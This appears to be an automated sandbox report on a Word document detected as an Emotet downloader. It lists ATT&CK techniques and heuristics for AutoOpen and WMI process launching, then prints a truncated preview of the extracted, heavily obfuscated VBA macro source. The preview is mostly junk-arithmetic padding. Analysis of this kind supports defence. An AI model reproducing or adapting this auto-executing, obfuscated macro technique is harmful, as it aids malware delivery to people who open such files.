Verdict: MALICIOUS (Risk Score 282)
Malware Insights
MITRE ATT&CK techniques:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
- T1059 Command and Scripting Interpreter
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6938868-0', strongly suggesting the Emotet family. Critical heuristics indicate the presence of VBA macros that utilize WMI to launch processes, a common technique for executing downloaded payloads. The autoopen macro is present, which is a standard execution trigger for malicious Office documents.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-6938868-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6938868-0
- VBA macros detected [medium, 4 related findings, OLE_VBA_MACROS]: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical, OLE_VBA_WMI_PROCESS_CREATE]: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32892 bytes |

SHA-256 of macros.bas: 01b5a0db12d972bb4af9dd31bfba12e38a92648f0541e025b2951581b930dad0

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "VAAUUB_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "icAAZoX"
Attribute VB_Base = "0{2997F2DB-1262-4586-8D08-231C591B1D29}{B4C2A185-133C-4791-9324-9DF33FE5AE67}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "BoUwUUXG"
Attribute VB_Base = "0{2C3E3C8E-70E1-4DA6-93E3-30FEC4787FA1}{6C0DE2F1-FA8D-4CF5-84CB-7790AB357B83}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "wAQAA_"
Sub autoopen()
If uxAAkAD = NA1QG4Z Then
jAQAAA = zA1_QoB - ToXAUUo
Select Case iXQwBXc
Case 65162038
kADUAUC = CVar(666578847 * Rnd(ZA_QcwAx * Round(887473702) / 242864275 * CLng(757993238 * Sqr(YGZoA4kZ))))
S1BA_B4A = Round(NcwAAw4B)
Case 944900146
lAcAAkBw = XQAkZA
YABAXB = Atn(493293848)
End Select
End If
If aGQCAk = ikBX1c Then
hxX1AX = oBAA_BAU - K4UkAoDk
Select Case jAXGUxB
Case 271243162
zAGAXAwC = CVar(681153159 * Rnd(W4AQQAQ * Round(103699670) / 317246957 * CLng(195825112 * Sqr(hXAGwD))))
TxAAoA = Round(ZAAAAAAB)
Case 556483373
kAAAAx = WBQxow
UBoo4A = Atn(576082915)
End Select
End If
KA_BAZZD
If IDACCB = TAAABkC Then
HAAAAAUD = hBZwo1 - pAUQABA
Select Case WwAAAUAc
Case 586122411
MGw4AQAG = CVar(885125058 * Rnd(IBQA1w * Round(594991175) / 99850238 * CLng(909829081 * Sqr(XcAZGB_B))))
iAkkAD = Round(CAXkAAC)
Case 640849976
kUZQ_U = YAkcw1
iDAxBkUA = Atn(865124187)
End Select
End If
If SAGx_DAA = HcxGADAA Then
o1GAA4B = OkUxkAUc - nDAxAGC
Select Case MoAQAAxA
Case 988188220
tZwUQAAC = CVar(921200261 * Rnd(GAAAUAA * Round(742046848) / 354836337 * CLng(103513869 * Sqr(soC4UAk))))
Rk_AowAX = Round(G_GAA4co)
Case 848979372
OoAAUQ = BwAAAQ
DQCcBkk = Atn(429605869)
End Select
End If
End Sub
Attribute VB_Name = "jxUoA1"
Function KA_BAZZD()
On Error Resume Next
If uUAX1wxD = BAAA4UB Then
nw1ZoAA = RCCQxZ - GCBUAX
Select Case cAkADkU
Case 904750789
j4X1DAA = CVar(910214260 * Rnd(iAAACQ * Round(584309993) / 917770668 * CLng(906200044 * Sqr(BABAQAA))))
NAABAQ = Round(dAGAXAA1)
Case 627849234
bQQcGxAA = iAQoQAQB
IGADBxxB = Atn(94616384)
End Select
End If
If iDDZAA = EQUcAcQ Then
I1AADZU = zABQBAZ - DUcAX1
Select Case mAAAoB
Case 366587228
IAXwBD = CVar(512595410 * Rnd(zAQcD_4A * Round(461546983) / 529527392 * CLng(456643298 * Sqr(fwAQDA))))
L_B1A4 = Round(LA_AAA)
Case 25159617
NAGwDBwB = wADxDB
SGUCoAQw = Atn(214933498)
End Select
End If
If u_wBA1AA = noQwBQX Then
PA1AQAC = MAQXUQBA - pCXB1o
Select Case ncQD1A
Case 688333490
fA_CADB = CVar(695435046 * Rnd(dXcDAGA * Round(487424603) / 695365938 * CLng(122760197 * Sqr(bADAwCko))))
cAwXGXZ = Round(uowQAQ4)
Case 457228699
ncxAAQ = HoABBkA
IAxBxA = Atn(524129598)
End Select
End If
If 7008 < 87979 Then
AooAAoAA = 0
If aAQAcAD = kxD1A1 Then
EABAA4 = o_ocAAUD - OAxDDAAo
Select Case kcC1Bwc_
Case 313975799
GBAXAZ = CVar(528931707 * Rnd(OxGwxAk * Round(9456710) / 354298458 * CLng(406005794 * Sqr(TwxAQBk))))
NxDZAG =
... (truncated)